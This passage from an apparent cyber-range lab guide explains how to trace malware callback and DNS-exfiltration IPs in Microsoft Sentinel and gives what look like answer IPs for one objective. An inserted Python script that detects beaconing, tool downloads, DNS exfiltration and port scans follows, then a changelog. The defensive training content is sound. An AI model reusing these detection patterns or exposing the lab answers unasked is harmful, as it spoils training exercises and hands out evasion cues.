one IP address, while alerts related to malware being downloaded and executed are
likely to contain the other. In Microsoft Sentinel we can review network traffic to find
each IP address. We could formulate queries about the first by recalling what ports
were being used by the callback malware, or by looking for external traffic during
specific timeframes from the internal compromised IP addresses. For the second, we
could formulate a query looking for web traffic from compromised endpoints, or for
the logs from the DNS exfiltration.
40.77.31.232, 23.99.191.12
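The query-building steps described above (the callback port and timeframe for the first address; web traffic from compromised endpoints and DNS exfiltration logs for the second) and the earlier point about blocking the attack source while treating port scanners as a monitoring signal can be written out as plain detection logic. The script below is an added example, not part of this guide or of the Project Ares environment: it runs against constructed flow and DNS records, and the internal hosts, the RFC 5737 documentation addresses, the callback port, the incident window and the label-length threshold are all assumptions. The filters mirror what one would express as Microsoft Sentinel analytics queries over the same fields.

```python
"""Added example: apply the guide's investigative reasoning to constructed network
flow and DNS records. Nothing here comes from the lab environment; every host,
address, port and timestamp is made up for illustration."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")               # assumed internal range
COMPROMISED = {"10.0.5.21", "10.0.5.33"}          # assumed compromised workstations
CALLBACK_PORT = 4444                               # assumed port seen in the callback alert


def _t(s):
    return datetime.fromisoformat(s)


def is_external(ip):
    return ip_address(ip) not in INTERNAL


# Constructed flow records: (time, src_ip, dst_ip, dst_port). External IPs are RFC 5737 ranges.
FLOWS = [
    # reconnaissance: one external host sweeping ten ports on a web server before the attack
    *[(_t(f"2022-08-01T08:00:{i:02d}"), "198.51.100.77", "10.0.1.10", p)
      for i, p in enumerate([21, 22, 25, 80, 135, 139, 443, 445, 3389, 8080])],
    # callback beacons from a compromised workstation, once every 60 seconds
    *[(_t("2022-08-01T09:00:00") + timedelta(seconds=60 * i), "10.0.5.21", "203.0.113.45", CALLBACK_PORT)
      for i in range(6)],
    # tool download over HTTP from both compromised hosts
    (_t("2022-08-01T09:02:10"), "10.0.5.21", "203.0.113.90", 80),
    (_t("2022-08-01T09:41:05"), "10.0.5.33", "203.0.113.90", 80),
    # ordinary browsing from an uncompromised host and an internal connection (both ignored)
    (_t("2022-08-01T09:05:00"), "10.0.5.50", "203.0.113.200", 443),
    (_t("2022-08-01T09:06:00"), "10.0.5.21", "10.0.1.10", 443),
]

# Constructed DNS query records: (time, client_ip, query_name)
DNS = [
    (_t("2022-08-01T09:30:00"), "10.0.5.33", "www.example.com"),
    (_t("2022-08-01T09:31:00"), "10.0.5.33", ("4d5a9000" * 5) + ".ex.example.net"),
    (_t("2022-08-01T09:31:01"), "10.0.5.33", ("f0" * 24) + ".ex.example.net"),
]


def find_callback_ip(flows, compromised, port, start, end):
    """Callback address: the external host that compromised endpoints contact on the
    known callback port inside the incident window; also reports the beacon period."""
    hits = defaultdict(list)
    for t, src, dst, dport in flows:
        if src in compromised and dport == port and is_external(dst) and start <= t <= end:
            hits[dst].append(t)
    if not hits:
        return None
    dst, times = max(hits.items(), key=lambda kv: len(kv[1]))
    times.sort()
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    period = round(sum(gaps) / len(gaps)) if gaps else None
    return {"ip": dst, "connections": len(times), "beacon_period_s": period}


def find_download_sources(flows, compromised, web_ports=(80, 443)):
    """Staging server: external hosts that compromised endpoints fetched from over HTTP(S)."""
    return sorted({dst for _, src, dst, dport in flows
                   if src in compromised and dport in web_ports and is_external(dst)})


def find_dns_exfil(dns, max_label=40):
    """DNS exfiltration leaves unusually long leftmost labels; count them per (client, parent)."""
    suspects = Counter()
    for _, client, name in dns:
        first, _, parent = name.partition(".")
        if len(first) >= max_label:
            suspects[(client, parent)] += 1
    return dict(suspects)


def find_scanners(flows, before, min_ports=8):
    """Reconnaissance: external sources touching many distinct internal ports before the attack."""
    ports = defaultdict(set)
    for t, src, dst, dport in flows:
        if t < before and is_external(src) and not is_external(dst):
            ports[src].add(dport)
    return {src: len(p) for src, p in ports.items() if len(p) >= min_ports}


def triage(flows=FLOWS, dns=DNS):
    start, end = _t("2022-08-01T08:30:00"), _t("2022-08-01T10:00:00")  # assumed incident window
    callback = find_callback_ip(flows, COMPROMISED, CALLBACK_PORT, start, end)
    downloads = find_download_sources(flows, COMPROMISED)
    # Confirmed attack infrastructure goes on the block list; scanners are kept as a monitoring
    # signal rather than blocked, following the guide's caveat about maintaining such lists.
    block = sorted(({callback["ip"]} if callback else set()) | set(downloads))
    return {"callback": callback, "download_sources": downloads, "dns_exfil": find_dns_exfil(dns),
            "recon_sources": find_scanners(flows, before=start), "block_list": block}


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Each finding is returned by a named function rather than only printed, so the same filters can be re-pointed at exported firewall or DNS logs; the thresholds (beacon port, label length, port count) are the parameters an analyst would tune when turning this into an analytics rule.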
Microsoft 365 Defender doesn't just offer preventive and reactive security; it can also
help guide effective security planning and prioritization. From Threat Analytics to
Vulnerability Management, the Defender portal provides insights from across your
environment and security tools.
For additional information about the tools and features that might be helpful,
reference the "Security recommendations - threat and vulnerability management" link
in the Documentation folder on your Analyst desktop.
1. Addition of Appendix A
2. Changes to the wording and solution for eight Learning Objectives, resulting in changes to
this document as well as the eight solution videos:
• Added a Note in Objective #17, Hint #4 mentioning that using Sentinel will not help the
player find the answer.
• Added a Note in Objective #18, Hint #4 on how to make the solution easier to find.
• Fixed Obj #2, Hint #4 changed – New description on finding the solution.
• Fixed Obj #3, Hint #4 changed – New description on finding the solution.
• Fixed Obj #4, Hint #3 and #4 changed – New descriptions on finding the solution.
• Fixed Obj #16, Hint #4 changed – New description on finding the solution.
• Fixed Obj #17, Hint #1 and Hint #4 changed – New descriptions on finding the solution.
• Fixed Obj #18, Hint #4 changed – New description on finding the solution.
• Fixed Obj #19, Hint #4 changed – New descriptions on finding the solution.
• Fixed Obj #26, Hint #4 changed – New description on finding the solution.
• New videos created for Objectives: 2, 3, 4, 16, 17, 18, 19, 26.
For 2022.07.28:
• Fixed Obj#12, Hint #4 changed – New description on finding the solution.
• Objectives 17 and 19 were removed. The original objective 21 was switched to be after the
original objective 22. Objectives 18 through the end were renumbered accordingly.
• Fixed Obj #2, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #4, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #12, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #16, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Obj #2, Hint #4 changed – New description on finding the solution. Updated video.
• Fixed Objectives #2, 3, 5, 6, 7, 8, 9, 10, 11, 13, 21, 22, 23, 24, 25, 26, 27 and 28 by adding special
wording around those Objectives that have this text in hint #4: "privilege escalation and
ransomware". Recorded all new walkthrough videos for each.